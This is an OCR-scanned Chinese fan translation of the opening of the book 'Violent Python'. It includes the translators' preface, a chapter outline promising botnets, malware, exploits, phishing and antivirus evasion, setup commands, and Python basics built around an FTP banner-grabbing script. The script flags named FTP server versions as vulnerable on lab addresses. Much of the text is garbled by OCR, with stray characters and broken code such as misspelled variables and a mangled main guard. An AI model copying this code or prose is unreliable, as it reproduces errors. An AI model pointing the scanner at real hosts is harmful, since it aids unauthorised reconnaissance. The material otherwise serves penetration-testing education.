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第 一 译 者 : 草帽 小 子 -DJ 

第 二 译 者 : crown ` prince 


偶然 机 会 ， 与 草帽 小 子 -DJ 先生 结识 ， 我 们 都 是 网 络 安全 爱好 者 ， 都 是 python 爱 好 
者 ， 都 想 翻译 些 文章 提 高 自己 英文 水 平 ， 又 都 想 做 出 点 事情 ， 于 是 《Violent 
Python》 的 中 文 版 诞生 了 。 


《Violent Python) ( http://book.douban.com/subject/11605108/ ) 这 本 书 将 
python 与 渗透 测试 很 好 的 结合 在 了 一 起 ， 作 者 每 一 章 会 通过 一 个 小 故事 引导 读者 ， 
通过 这 本 书 ， 已 经 掌握 python 的 读者 可 以 更 好 的 将 python 应 用 到 渗透 测试 所 需 程序 
上 。 


翻译 这 本 书 是 为 了 学 习 ， 翻 译 过 程 中 ， 我 们 已 经 尽 最 大 努力 理解 作者 要 表达 的 意 
思 ， 纯 属 兴 趣 爱 好 ， 不 用 于 任何 商业 活动 。 翻 译 水 平 有 限 ， 望 大 家 多 多 指点 ! 后 续 
的 章节 会 随 着 我 们 学 习 的 进程 逐步 分 享 给 大 家 。 


分 享 到 乌云 ， 希 望 在 我 们 学 习 的 过 程 中 ， 也 能 帮助 到 更 多 人 。 正 如 乌云 zone 所 
说 ，“ 你 可 以 加 入 某 些 特定 的 领域 ， 去 关注 那些 你 想 去 学 习 的 人 ， 同 时 持续 的 分 享 和 
毫 无 保留 的 帮助 他 人 ， 


最 后 ， 要 感谢 本 书 原作 者 Chris Katsaropoulos 先 生 和 他 的 那 句 "anything is possible 
if you try hard enough.“， 没 有 这 些 就 没有 我 们 翻译 的 动力 ， 感 谢 本 书 的 第 一 译 者 草 
冒 小子-DJ 先 生 ， 这 本 书 的 大 部 分 是 由 他 翻译 的 ， 我 仅仅 帮助 他 翻译 了 部 分 章节 和 

进行 了 力所能及 的 帮助 ， 所 以 要 感谢 他 对 我 的 信任 和 支持 。 


全 书目 录 

介绍 

Python 是 一 门 黑 客 语 言 ， 它 简单 易学 ， 开 发 效率 高 ， 拥 有 大 量 的 第 三 方 库 ， 学 习 门 
监 低 。Python 提 供 了 高 效 的 开发 平台 来 构建 我 们 自己 的 攻击 工具 。 如 果 你 用 的 是 


Mac OS X 或 者 是 Linux 系 统 ，Python 已 经 内 置 在 你 的 系统 中 。 丰 富 的 攻击 攻击 已 经 
存在 ， 学 习 Python 可 以 帮助 你 解决 那些 工具 不 能 解决 的 问题 。 


目标 人 和 群 


每 个 人 的 学 知识 并 不 同 ， 然 而 ， 不 管 你 是 想 学 习 如 何 编写 Python 代码 的 初学 者 ， 或 
者 是 一 位 想 将 你 的 技术 运用 到 渗透 测试 中 的 高 级 程序 员 。 这 本 书 适 合 你 | 


本 书 的 结构 
BRAD > KIN THRESH 参透 测试 的 Python 例子 。 接 下 来 的 篇 章 我 们 将 介 


绍 用 Python 进 行 渗透 测试 ，Web 分 析 ， 网 络 流量 分 析 ， 取 证 分 析 和 攻击 无 线 设 备 
等 。 希 望 这 些 例子 能 启发 读者 编写 自己 的 Python 脚 本 ! 


第 一 章 : 介绍 
如 果 你 以 前 没 有 Python 编程 经 验 ， 一 章 将 带 你 浏览 一 下 Python 的 背 


H $ 
Sho BRS Ft ee oe ee 章 。 以 后 
的 章节 将 不 会 介绍 更 多 的 语言 细节 ， 你 可 以 根据 兴趣 自行 学 习 。 


第 二 章 : 渗透 测试 


章 介 绍 了 Python 脚 本 用 于 渗透 测 试 的 内 容 ， 本 章 的 例子 包含 建立 一 个 端口 扫描 
器 ， 构 建 一 个 SSH 的 僵尸 网 络 ， 降 伏 FTP， 编 写 病毒 和 漏 润 利 用 代 癌 o 


第 三 章 : 法 庭 调查 取证 
第 三 章 将 利用 Python 进行 数字 调查 取证 。 本 章 提供 了 个 人 地 理 定 位 ， 数 据 恢 复 ， 从 
dn 文档 元 数据 ， 镜 像 中 提取 痕迹 ， 调 查 应 用 程序 和 移动 设备 的 痕 
还 o 
第 四 章 : 网 络 流量 分 析 

第 四 章 将 使 用 Python 进行 网 络 流量 分 析 ， 本 章 的 脚本 演示 了 从 捕获 的 数据 包 中 定位 


poe 探讨 流行 的 DDOS 攻 击 工 具 ， 发 现 潜 藏 的 扫描 ， 分 析 僵 尸 网 络 流 量 ， 挫 败 
入 侵 检 测 系 统 。 


PRE: 无 线 攻 击 
第 五 章 将 介绍 无 线 网 络 和 蓝牙 设备 攻击 。 本 章 的 例子 将 演示 怎样 噢 探 和 解析 无 线 网 


络 流量 ， 构 建 一 个 无 线 网 络 记录 器 ， 发 现 隐藏 的 无 线 网 络 ， 确 认 恶 意 的 无 线 网 络 工 
具 的 使 用 ， 追 踪 蓝 牙 接收 器 ， 攻 击 蓝牙 汤 洞 。 


第 六 章 : Web 侦 查 


本 章 将 演示 用 Python 侦 查 Web 性 息 。 本 章 的 例子 包含 用 Python 匿 名 访问 Web 网 站 ， 
试探 流行 的 媒体 网 站 ， 发 送 钓 鱼 邮 件 。 


第 七 章 : 躲避 杀毒 系统 


在 最 后 一 章 ， 我 们 构建 了 一 个 躲避 杀毒 系统 的 恶意 软件 ， 我 们 上 传 我们 的 恶意 软件 
到 在 线 的 杀毒 系统 扫描 。 


1. 建立 Python 开发 环境 

2. Python 语言 简介 

3. 变量 ， 字 符 串 ， 列 表 ， 字 典 介 绍 

4. FL > ARE > HR BRS 

5. 写 第 一 个 Python 程序 ， 字 典 密码 破解 器 

6. 写 第 二 个 Python 程序 ， 压 缩 文 件 密码 暴力 破解 


对 我 来 说 ， 武 术 的 非凡 之 处 在 于 它 的 简单 。 简 单 是 最 美的 ， 而 武术 也 没有 什么 
特别 之 处 ; 以 无 法 为 有 法 ， 以 有 限 为 无 限 ， 是 为 武术 最 高 境界 ! 


RABE 李小龙 


引文 : 用 python 进行 的 一 次 渗透 测试 


最 近 ， 我 的 一 个 朋友 对 一 家 世界 财富 500 强 公司 的 计算 机 安全 系统 进行 了 渗透 测 
试 。 虽 然 该 公司 已 建立 和 保持 一 个 了 优秀 的 安全 机 制 ， 但 他 最 终 还 是 发 现 了 一 个 在 
在 漏洞 而 未 打 补 丁 的 服务 器 。 几 分 钟 之 内 ， 他 用 开源 工具 入 侵 了 这 个 系统 并 获得 管 
理 权 。 然 后 ， 他 扫描 了 剩 下 的 服务 器 以 及 客户 机 ， 并 没有 发 现任 何 额外 的 漏洞 。 


从 这 一 点 看 ， 他 的 测试 似乎 结束 了 ， 但 是 丨 正 的 渗透 测试 才刚 刚 开 始 。 


他 打开 了 自己 常用 的 文本 编辑 器 ， 写 下 了 一 个 Python 测试 脚本 ， 利 用 这 个 脚本 发 现 
了 其 余 存 在 漏洞 的 服务 器 ， 几 分 钟 后 ， 他 获得 了 网 络 上 超过 一 千 台 机 器 的 管理 权 ， 
然而 ， 在 这 样 做 时 ， 他 随后 产生 了 一 个 难以 管理 的 问题 。 他 知道 ， 系 统管 理 员 会 注 
意 到 他 的 攻击 并 拒绝 再 让 他 访问 。 所 以 ， 他 赶紧 想 办 法 在 自己 已 经 控制 的 服务 器 
上 ， 安 装 永久 的 后 门 。 


检查 了 一 下 自己 渗透 测试 用 到 的 文件 后 ， 我 的 朋友 意识 到 他 的 这 台 客 户 机 存在 着 很 
重要 的 域 控制 器 。 以 此 得 知 ， 管 理 员 使 用 了 一 个 完全 独立 的 管理 账户 登陆 域 控制 

器 ， 我 的 朋友 写 了 一 个 小 脚本 检查 1000 台 机 器 上 已 经 登录 的 用 户 ， 过 了 一 会 ， 我 
的 朋友 被 告知 ， 域 管理 员 登 录 到 了 一 个 机 器 。 他 的 监测 基本 完成 ， 我 的 朋友 现在 知 
道 在 哪里 继续 他 的 攻击 了 。 


我 朋友 的 迅速 反应 和 他 在 压力 下 能 创造 性 的 思考 的 能 力 ， 促 使 他 成 为 了 一 个 渗透 测 
试 者 。 他 为 了 成 功 入 侵 这 个 世界 500 强 公 司 ， 自 己 写 了 脚本 工具 。 一 个 小 的 Python 
脚本 帮助 他 入 侵 了 一 千 多 个 工作 站 。 另 一 个 小 脚本 允许 他 在 管理 员 发 现 前 成 功 
triage。 一 个 站 正 的 渗透 测试 者 会 编写 自己 的 工具 来 解决 所 遇 到 的 问题 。 所 以 ， 让 
我 们 以 安装 开发 环境 为 开始 ， 学 习 如 何 打 造 自 己 的 工具 吧 ! 


建立 开发 环境 


Python 的 下 载 网 站 〈 http://www.python.org/download/ ) 提供 了 Python 在 
Windows，Mac OS X 和 Linux 上 的 安装 包 。 如 果 您 运行 的 是 Mac OS X A Linux ’ 
Python 的 解释 器 已 经 预先 安装 在 了 系统 上 。 安 装 包 为 程序 开发 者 提供 了 Python 解 
释 器 ， 标 准 库 和 几 个 内 置 模块 。 Python 标准 库 和 内 置 模块 提供 的 功能 范围 广泛 ， 
包括 内 建 的 数据 类 型 ， 弄 常 处 理 ， 数 字 和 数学 模块 ， 文 件 处 理 功 能 ， 如 加 密 服 务 ， 
与 操作 系统 互 操作 性 ， 网 络 数据 处 理 ， 并 与 IP 协议 交互 ， 还 包括 许多 其 他 有 用 模 
块 。 同 时 ， 程 序 开 发 者 可 以 很 容易 地 安装 任何 第 三 方 软件 包 。 第 三 方 软件 包 的 完整 
列表 可 在 http://pypi.python.org/pypi/ 上 看 到 


安装 第 三 方 库 


在 第 二 章 中 ， 我 们 将 利用 python 的 python-nmap 包 来 处 理 的 NMAP 的 结果 。 下 

面 的 例子 描述 了 如 何 下 载 和 安装 python-nmap 包 (RAAT E HA) 。 一 旦 
我 们 已 经 保存 了 包 到 本 地 ， 我 们 解压 这 个 包 ， 并 进入 压缩 后 的 目录 中 。 在 工 录 中 ， 

我 们 执行 python setup.py 命令 来 安装 python-nmap 包 。 安 装 大 多 数 第 三 方 

包 将 遵 特 下载， 解压 ， 执 行 python setup.py 命令 进行 安装 的 相同 的 步骤 。 


programmer:~# wget http://xael.org/norman/python/python-nmap/pytho 
0.2.4.tar.gz-On map.tar.gz 

--2012-04-24 15:51:51--http://xael.org/norman/python/python-nmap/ 
python-nmap-0.2.4.tar.gz 

Resolving xael.org... 194.36.166.10 

Connecting to xael.org|194.36.166.10|:80... connected. 

HTTP request sent, awaiting response... 200 OK 

Length: 29620 (29K) [application/x-gzip] 

Saving to: 'nmap.tar.gz' 


=============>] 29,620 60.8K/s in 0.5s 

2012-04-24 15:51:52 (60.8 KB/s) - 'nmap.tar.gz' saved [29620/29620 
programmer:~# tar -xzf nmap.tar.gz 

programmer:~# cd python-nmap-0.2.4/ 

programmer :~/python-nmap-0.2.4# python setup.py install 

running install 

running build 

running build_py 

creating build 

creating build/lib.linux-x86_64-2.6 

creating build/1lib.linux-x86_64-2.6/nmap 

copying nmap/__init__.py -> build/1lib.linux-x86_64-2.6/nmap 
copying nmap/example.py -> build/1lib.1linux-x86_64-2.6/nmap 

copying nmap/nmap.py -> build/lib.linux-x86_64-2.6/nmap 

running install_lib 

creating /usr/local/lib/python2.6/dist-packages/nmap 

copying build/lib.linux-x86_64-2.6/nmap/__init__.py -> /usr/local/. 
python2.6/dist-packages/nmap 

copying build/lib.linux-x86_64-2.6/nmap/example.py -> /usr/local/1: 
python2.6/dist-packages/nmap 

copying build/lib.linux-x86_64-2.6/nmap/nmap.py -> /usr/local/lib/ 
python2.6/dist-packages/nmap 

byte-compiling /usr/local/lib/python2.6/dist-packages/nmap/__init_ 
to __init__.pyc 

byte-compiling /usr/local/lib/python2.6/dist-packages/nmap/example 
to example.pyc 

byte-compiling /usr/local/lib/python2.6/dist-packages/nmap/nmap. py 
nmap. pyc 

running install_egg_info 

Writing /usr/local/lib/python2.6/dist -packages/python_nmap-0.2.4.e¢ 





为 了 能 够 更 简单 的 安装 python 4) é > python 提供 了 easy_install 模块 。 运 行 这 
个 简单 的 安装 程序 ， 程 序 将 会 在 python 库 中 了 寻找 这 个 包 ， 如 果 发 现 则 下 载 它 并 自动 


ne at 


KR 


programmer:~ # easy_install python-nmap 

Searching for python-nmap 
Readinghttp://pypi.python.org/simple/python-nmap/ 
Readinghttp://xael.org/norman/python/python-nmap/ 

Best match: python-nmap 0.2.4 
Downloadinghttp://xael.org/norman/python/python-nmap/python-nmap- 
@.2.4.tar.gz 

Processing python-nmap-0.2.4.tar.gz 

Running python-nmap-0.2.4/setup.py -q bdist_egg --dist-dir /tmp/ea: 
install-rtyUSS/python-nmap-0.2.4/egg-dist-tmp-EOPENs 

zip_safe flag not set; analyzing archive contents... 

Adding python-nmap 0.2.4 to easy-install.pth file 

Installed /usr/local/lib/python2.6/dist-packages/python_nmap-0.2.4- 
py2.6.egg 

Processing dependencies for python-nmap 

Finished processing dependencies for python-nmap 


a al 


为 了 快速 建立 一 个 开发 环境 ， 我 们 建议 您 从 
http://www.backtracklinux.org/downloads/ 下 载 最 新 的 BackTrack Linux 的 渗透 测 
试 专 版 的 复制 版 。 他 提供 了 丰富 的 渗透 测试 工具 ; fl-teforensic = Web 网络 分 析 
tie 线 攻击 。 之 后 的 几 个 例子 中 。 可 能 会 用 到 一 些 早 已 内 置 在 BackTrack 的 工具 或 
。 当 在 本 书 的 例子 中 ， 需 要 用 到 标准 库 和 内 置 模块 之 外 的 第 三 方 包 的 时 候 ， 文 章 

将 全 会 提供 包 的 下 载 网 站 。 设 置 一 个 开发 环境 时 ， 提 前 下 载 好 所 有 的 这 些 第 三 方 模 块 

会 是 有 用 的 。 在 BackTrack 上 ， 您 可 以 通过 执行 easy_install 命令 来 安装 额外 
需要 的 库 ， 这 将 会 在 Linux 下 ， 下 载 大 多 数 例 子 中 用 到 的 库 。 





programmer:~ # easy_install pyPdf python-nmap pygeoip mechanize Be 
al = = 


第 五 章 用 到 了 一 些 明确 的 不 能 从 easy_install 下 载 的 的 蓝牙 库 。 您 可 以 使 用 包 
管理 器 下 载 并 安装 这 些 库 。 





attacker# apt-get install python-bluez bluetooth python-obexftp 
Reading package lists... Done 

Building dependency tree 

Reading state information... Done 

<,..SNIPPED. > 

Unpacking bluetooth (from .../bluetooth_4.60-Qubuntu8_all.deb) 
Selecting previously deselected package python-bluez. 

Unpacking python-bluez (from .../python-bluez_0.18-1_amd64.deb) 
Setting up bluetooth (4.60-Qubuntu8) 

Setting up python-bluez (0.18-1) 

Processing triggers for python-central 


此 外 ， 第 五 章 和 第 七 章 中 的 几 个 例子 需要 一 个 Windows 版 的 Python 下 载 器 。 最 新 
的 Windows 版 的 Python 下 载 器 ， 请 访问 http://www.python.org/getit/ 最 近 几 年 
python 源 代码 已 经 延伸 成 了 2.x 和 3.x 两 个 分 支 。Python 的 原作 者 Guido van 
Rossum 试图 清理 代码 使 语言 变 得 更 一 致 ， 这 个 行为 打破 了 python 2.x 版 本 与 之 后 
版 本 的 兼容 性 ， 例 如 作者 对 print 语句 的 更 改 。 在 本 书 出 版 时 ，BackTrack 5 R2 
把 Python 2.6.5 作为 稳定 的 python 版 本 。 


programmer# python -V 
Python 2.6.5 


解释 型 python VS 交互 型 python 


与 其 他 脚本 语言 类 似 ，Python 是 一 种 解释 型 语言 。 在 运行 时 ， 解 释 器 处 理 代码 并 执 
行 他 ， 为 了 演示 python 解释 器 的 使 用 ， 我 们 写 一 个 .py 文件 来 打 

ÉP "Hello World" 。 为 了 解释 这 个 程序 ， 我 们 调用 python 解释 器 创建 一 个 新 的 脚 
本 。 


programmer# echo print \"Hello World\" > hello.py 
programmer# python hello.py 
Hello World 


此 外 ，python 具有 交互 能 力 ， 程 序 设计 师 可 以 调用 python 解释 器 ， 并 直接 与 解释 
器 “交流 ”。 要 启动 解释 器 ， 程 序 开发 者 要 先 不 带 参 数 的 执行 python， 接 着 解释 器 会 
呈现 一 个 >>> 来 提示 程序 设计 师 ， 他 可 以 接收 命令 了 。 在 这 里 ， 程 序 设计 师 输 
A print "Hello World" 。 按 下 回 车 后 ，python 交互 解释 器 会 立即 执行 该 语 
8] o 


programmer# python 

Python 2.6.5 (r265:79063, Apr 16 2010, 13:57:41) 
[GCC 4.4.3] on linux2 

>>> 


>>> print "Hello World" 


Hello World 


为 了 初步 了 解 语言 背后 的 含义 ， 本 章 偶尔 会 用 到 python 解释 器 的 交互 能 力 。 你 可 以 
通过 找寻 >>> 提示 ， 来 发 现 样 例 中 对 解释 器 的 操作 。 因 为 我 们 要 解释 下 面 章节 中 
的 样 例 ， 所 以 我 们 将 通过 数 个 被 称 为 方法 或 函数 的 、 有 一 定 功能 的 代码 块 ， 来 建立 
我 们 的 脚本 。 每 当 我 们 完成 一 个 脚本 ， 我 们 将 展示 如 何 重 新 组 合 这 些 方法 (函数 ) 
来 让 他 们 在 main() 中 被 调用 。 试 图 运行 一 个 只 有 孤立 的 函数 定义 而 不 去 调用 他 们 
的 脚本 是 毫 无 意义 的 。 大 多 数 情 况 下 ， 你 都 可 以 认 出 完整 的 脚本 ， 因 为 他 们 都 有 定 
义 好 的 main() 函数 。 在 我 们 开始 写 我 们 的 第 一 个 程序 前 ， 我 们 将 说 明 一 些 python 
标准 库 的 重要 组 成 部 分 。 


Python 语言 


在 下 面 的 内 容 中 ， 我 们 会 讲解 变量 ， 数 据 类 型 ， 字 符 串 ， 复 杂 的 数据 结构 ， 网 络 ， 
选择 ， 循 环 ， 文 件 处 理 ， 异 常 处 理 ， 与 操作 系统 进行 交互 。 为 了 显示 这 一 点 ， 我 们 
将 构建 一 个 简单 的 TCP 类 型 的 漏洞 扫描 器 ， 读 取 来 自 服 务 的 提示 消息 ， 并 把 他 们 与 
已 知 的 存在 漏洞 的 服务 版 本 做 比较 ， 作 为 一 个 有 经 验 的 程序 设计 师 ， 你 可 能 会 发 现 
一 些 最初 的 示例 代码 的 设计 非常 难看 ， 事 实 上 ， 我 们 希望 你 能 在 我 们 的 代码 基础 上 
进行 发 展 ， 使 他 变 得 优雅 。 


那么 ， 让 我 们 从 任何 编程 语言 的 基础 一 变量 开始 吧 | 


` 
mn -| 


又 里 


在 python 中 ， 变 量 对 应 的 数据 存储 在 内 存 中 ， 这 种 在 内 存 中 的 位 置 可 以 存储 不 同 的 
值 ， 如 整 型 ， 实 数 ， 布 尔 值 ， 字 符 串 ， 或 更 复杂 的 数据 结构 ， 例 如 列表 或 字典 。 在 
下 面 的 代码 中 ， 我 们 定义 一 个 存储 整形 的 变量 和 一 个 存储 字符 串 的 提示 消息 ， 为 了 
把 这 两 个 变量 连接 到 一 个 字符 串 中 ， 我 们 必须 用 str() 函数 。 


>>> port = 21 

>>> banner = "FreeFloat FTP Server" 

>>> print "[+] Checking for "+banner+" on port "+str(port) 
[+] Checking for FreeFloat FTP Server on port 21 


当 程 序 设 计 师 声明 变量 后 ，python ARE ESRB TARE o BRL MRS 
明 变 量 的 类 型 ， 相 反 ，python 解释 器 决定 了 变量 类 型 何在 内 存 中 为 他 保留 的 空间 的 
大 小 。 思 考 下 面 的 例子 ， 我 们 正确 的 声明 了 一 个 字符 串 ， 一 个 整数 ， 一 个 列表 和 一 
个 布尔 值 ， 解释 器 都 自动 的 正确 的 识别 了 每 个 变量 的 类 型 。 


| 所 


>>> banner = "FreeFloat FTP Server" # A string 
>>> type(banner ) 

<type 'str'> 

>>> port = 21 # An integer 

>>> type(port) 

<type 'int'> 

>>> portList=[21,22,80,110] # A list 
>>> type(portList) 

<type ‘list'> 

>>> portOpen = True # A boolean 

>>> type(portOpen) 

<type 'bool'> 


字符 串 


在 python 中 字符 串 模 块 提供 了 一 系列 非常 强大 的 字符 串 操作 方法 。 阅 读 
http://docs.python.org/library/string.html 上 的 用 法 列表 的 python 文档 。 让 我 们 来 看 
几 个 常用 的 函数 。 思 考 下 面 这 些 函 数 的 用 法 ，upper() 方法 将 字符 串 中 的 小 写字 母 
转 为 大 写字 母 ， lower() 方法 转换 字符 串 中 所 有 大 写字 母 为 小 

写 ，replace(old,new) 方法 把 字符 串 中 的 old (8 FFF) HAM new (新 字符 
串 )， find() 方法 检测 字符 串 中 是 否 包含 指定 的 子 字符 串 。 


>>> banner = "FreeFloat FTP Server" 

>>> print banner.upper() 

FREEFLOAT FTP SERVER 

>>> print banner. lower() 

freefloat ftp server 

>>> print banner.replace('FreeFloat', 'Ability' ) 
Ability FTP Server 

>>> print banner.find('FTP') 
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Python 的 数据 结构 列表 ， 提 供 了 一 种 存储 一 组 数据 的 方式 。 程 序 设 计 师 可 以 构 
建 任 何 数据 类 型 的 列表 。 另 外 ， 有 一 些 内 置 的 操作 列表 的 方法 ， 例 如 添加 ， 删 除 ， 
插入 ， 弹 出 ， 获 取 索 引 ， 排 序 ， 计 数 ， 排 序 和 反 转 。 请 看 下 面 的 例子 ， 一 个 程序 通 
过 使 用 append() 添加 元 素来 建立 一 个 列表 ， 打 印 项 目 ， 然 后 在 再 次 输出 前 给 他 们 
排序 。 程 序 设 计 师 可 以 找到 特殊 元 素 的 索引 (例如 样 例 中 的 80) ， 此 外 ， 指 定 的 元 
素 也 可 以 被 移动 。( 例 如 样 例 中 的 443) 





>>> portList = [] 

>>> portList.append(21) 

>>> portList.append(80) 

>>> portList.append(443) 

>>> portList.append(25) 

>>> print portList 

[21, 80, 443, 25] 

>>> portList.sort() 

>>> print portList 

[21, 25, 80, 443] 

>>> pos = portList.index(80) 

>>> print "[+] There are "+str(pos)+" ports to scan before 80." 
[+] There are 2 ports to scan before 80. 

>>> portList.remove(443) 

>>> print portList 

[21, 25, 80] 

>>> cnt = len(portList) 

>>> print "[+] Scanning "+str(cnt)+" Total Ports." 
[+] Scanning 3 Total Ports. 


Python 的 数据 结构 一 字典， 提供 了 一 个 可 以 存储 任何 数量 python 对 象 的 哈 希 

表 。 字 典 的 元 素 由 键 和 值 组 成 ， 让 我 们 继续 用 我 们 的 漏洞 扫描 器 的 例子 来 讲解 
python 的 字典 。 当 扫描 指定 的 TCP 端口 是 ， 用 字典 包含 每 个 端口 对 应 的 常见 的 服 
务 名 会 很 有 用 。 建 立 一 个 字典 ， 我 们 能 查找 像 ftp 这 样 的 键 并 返回 端口 关联 的 值 
21。 雪 我 们 建立 一 个 字典 时 ， 每 一 个 键 和 他 的 用 被 冒号 隔 开 ， 同 时 ， 我 们 用 去 号 分 
隔 元 素 。 注 意 ， ,keys() 这 个 方法 将 返回 字典 的 所 有 键 的 列表 ， ,items() 这 个 
方法 将 返回 字典 的 元 素 的 一 系列 列表 。 接 下 来 ， 我 们 验证 字典 是 否 包含 了 指定 的 键 
ftp )， 伴 随 着 键 ， 值 21 返回 了 。 


-一 


>>> services = {'ftp':21, 'ssh':22, 'smtp':25, 'http':80} 
>>> services.keys() 

(tip, sm “ssh, http] 

>>> services.items() 

[('ftp', 21), (‘smtp', 25), ('ssh', 22), ('http', 80)] 
>>> services.has_key('ftp') 

True 

>>> services['ftp'] 

21 

>>> print "[+] Found vuln with FTP on port "+str(services['ftp' ]) 
[+] Found vuln with FTP on port 21 


a eB 
网 络 


套 接 字模 块 提 供 了 一 个 可 以 使 python 建 立 网 络 连 接 的 库 。 让 我 们 快速 的 编写 一 个 获 
取 提 示人 信息 的 脚本 ， 连 接 到 特定 IP 地 址 和 端口 后 ， 我 们 的 脚本 将 打印 提示 信息 ， 之 
后 ， 我 们 使 用 connect() 函数 连接 到 IP 地 址 和 端口 。 一 旦 连接 成 功 ， 就 可 以 通过 
套 接 字 进行 读 写 。 这 种 recv(1024) 的 方法 将 读 取 之 后 在 套 接 字 中 1024 字 节 的 数 
据 。 我 们 把 这 种 方式 的 结果 存 到 一 个 变量 中 ， 然 后 打印 到 服务 器 。 


>>> import socket 

>>> socket.setdefaulttimeout (2) 

>>> S = socket.socket() 

>>> s.connect(("192.168.95.148",21)) 
>>> ans = s.recv(1024) 

>>> print ans 

220 FreeFloat Ftp Server (Version 1.00). 


选择 


像 大 多 数 编 程 语言 一 样 ，python 提 供 了 条 件 选择 的 方式 ， 通 过 jf 语句 ， 计 算 一 个 加 
辑 表 达 式 来 判断 选择 的 结果 。 继续 写 我 们 的 脚本 ， 我 们 想 知道 ， 是 否 指 定 的 FTP 服 


FTP 服 务 器 版 本 作 比 较 。 


>>> import socket 
>>> socket.setdefaulttimeout (2) 
>>> s = socket.socket() 
>>> s.connect(("192.168.95.148",21)) 
>>> ans = s.recv(1024) 
>>> if ("FreeFloat Ftp Server (Version 1.00)" in ans): 
print "[+] FreeFloat FTP Server is vulnerable." 
elif ("3Com 3CDaemon FTP Server Version 2.0" in banner): 
print "[+] 3CDaemon FTP Server is vulnerable." 
elif ("Ability Server 2.34" in banner): 
print "[+] Ability FTP Server is vulnerable." 
elif ("Sami FTP Server 2.0.2" in banner): 
print "[+] Sami FTP Server is vulnerable." 
else: 
print "[-] FTP Server is not vulnerable." 


[+] FreeFloat FTP Server is vulnerable." 


异常 处 理 


即使 一 个 程序 设计 师 编 写 的 程序 语法 正确 ， 该 程序 仍然 可 能 在 运行 或 执行 时 发 生 错 
误 。 考 虑 经 典 的 一 种 运行 错误 除 以 零 。 因 为 零 不 能 做 除数 ， 所 以 python 解 释 器 
显示 一 条 消息 ， 把 错误 信息 告诉 程序 设计 师 : 该 错误 使 程序 停止 执行 。 





>>> print 1337/0 

Traceback (most recent call last): 

File "<stdin>", line 1, in <module> 
ZeroDivisionError: integer division or modulo by ze 


如 果 我 们 想 在 我 们 预 设 范围 内 处 理 错误 ， 会 对 运行 的 程序 产生 什么 影响 呢 ? 
seen an ates 就 可 以 这 样 做 。 让 我 们 来 更 新 前 面 的 例子 ， 我 们 使 
用 try/except 进行 异常 处 理 。 现 在 程序 试图 除 以 零 。 当 错误 发 生 时 ， 我 们 的 弄 
常 处 理 捕获 错误 并 把 错误 信息 打印 到 屏幕 上 。 


>>> try: 
print "[+] 1337/0 = "+str(1337/0) 
except: 
print "[-] Error. " 
[-] Error 
>>> 


不 幸 的 是 ， 这 给 了 我 们 非常 少 的 关于 错误 的 异常 处 理 的 信息 。 但 在 对 待 特殊 错误 
时 ， 这 可 能 很 有 用 ， 要 做 到 这 一 点 ， 我 们 将 存储 异常 信息 到 一 个 变量 中 ， 来 打印 出 
异常 信息 。 


>>> try: 
28 print "[+] 1337/0 = "+str(1337/0) 
. except Exception, e: 
print "[-] Error = "+str(e) 


[-] Error = integer division or modulo by zero 
>>> 


现在 ， 让 我 们 用 异常 处 理 来 更 新 我 们 的 脚本 ， 我 们 用 异常 处 理 把 网 络 连接 代码 包装 
起 来 ， 接 下 来 ， 我 们 连接 到 一 a oo nega o 如 果 我 介 
等 待 连接 超时 ， 我 们 将 看 到 一 条 信息 来 表明 网 络 连接 操作 超时 。 然 后 ， 我 们 的 程序 


a 


>>> import socket 
>>> socket.setdefaulttimeout (2) 
>>> s = socket.socket() 
>>> try: 
; s.connect(("192.168.95.149",21)) 
. except Exception, e: 
print "[-] Error = "+str(e) 


[-] Error = Operation timed out 


在 本 书 中 ， 让 我 们 为 你 提供 一 个 与 异常 处 理 有 关 的 人 警告， 为 了 清楚 的 说 明 各 种 各 样 
Ee ， 在 下 面 的 内 容 中 ， 我 们 已 经 在 最 小 的 地 方 都 添加 了 异常 处 理 ， 但 我 们 仍然 
欢迎 你 更 新 这 新 脚本 ， 并 把 强化 的 异常 处 理 代码 分 享 到 配 到 网 站 上 。 


Ph aX 
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计 师 写 代 码 来 执行 单独 或 关联 的 行为 。 


尽管 python 提 供 了 许多 内 置 函 数 ， 程 序 设计 师 仍 然 可 以 创建 自 定义 的 函数 。 关 键 
字 def #467 —*+ HH» 程序 设计 师 可 以 把 任何 变量 放 到 括号 里 。 这 些 变量 随后 
Gow 这 意味 着 在 函数 内 部 对 这 些 变量 的 任何 变化 ， 都 将 影响 调用 的 函数 的 值 。 

蒜 续 以 我 们 的 FTP 汤 洞 扫描 器 为 例 ， 让 我 们 创建 一 个 函数 来 执行 只 连接 到 FTP 服 务 
PRO slits 


import socket 
def retBanner(ip, port): 
try: 
socket.setdefaulttimeout (2) 
s = socket.socket() 
s.connect((ip, port)) 
banner = s.recv(1024) 
return banner 
except: 
return 
def main(): 
ip1 = '192.168.95.148' 
ip2 = '192.168.95.149' 
port = 21 
banner1 = retBanner(ip1, port) 
if banner1: 
print '[+] " + ip1 + ': "+ banneri 
banner2 = retBanner(ip2, port) 
if banner2: 
print '[+] ' + ip2 + ': ' + banner2 
if _name == '_ main_': 
main() 


在 返回 信息 后 ， 我 们 的 脚本 需要 与 已 知 存在 漏洞 的 程序 进行 核对 。 这 也 反映 了 函数 
的 单一 性 和 相关 性 。 该 函数 checkvulns() 用 获得 的 信息 来 对 服务 器 存在 的 漏洞 
进行 判断 。 


import socket 
def retBanner(ip, port): 
try: 
socket.setdefaulttimeout (2) 
s = socket.socket() 
s.connect((ip, port)) 
banner = s.recv(1024) 
return banner 
except: 
return 
def checkVulns(banner): 
if 'FreeFloat Ftp Server (Version 1.00)' in banner: 
print '[+] FreeFloat FTP Server is vulnerable. ' 
elif '3Com 3CDaemon FTP Server Version 2.0' in banner: 
print '[+] 3CDaemon FTP Server is vulnerable. ' 
elif 'Ability Server 2.34' in banner: 
print '[+] Ability FTP Server is vulnerable. ' 
elif 'Sami FTP Server 2.0.2' in banner: 
print '[+] Sami FTP Server is vulnerable. ' 
else: 
print '[-] FTP Server is not vulnerable. ' 
return 
def main(): 
ip1 = '192.168.95.148' 


ip2 = '192.168.95.149' 
ip3 = '192.168.95.150' 
port = 21 


banner1 = retBanner(ipi, port) 

if banner1: 
print '[+] ' + ip1 + ' ' + banneri1.strip('\n’) 
checkVulns(banner1) 

banner2 = retBanner(ip2, port) 

if banner2: 
print '[+] ' + ip2 + ': ' + banner2.strip('\n') 
checkVulns(banner2) 

banner3 = retBanner(ip3, port) 

if banner3: 


print '[+] ' + ip3 + ': ' + banner3.strip('\n') 
checkVulns(banner3) 
if _name == ' main_': 
main() 


迭代 


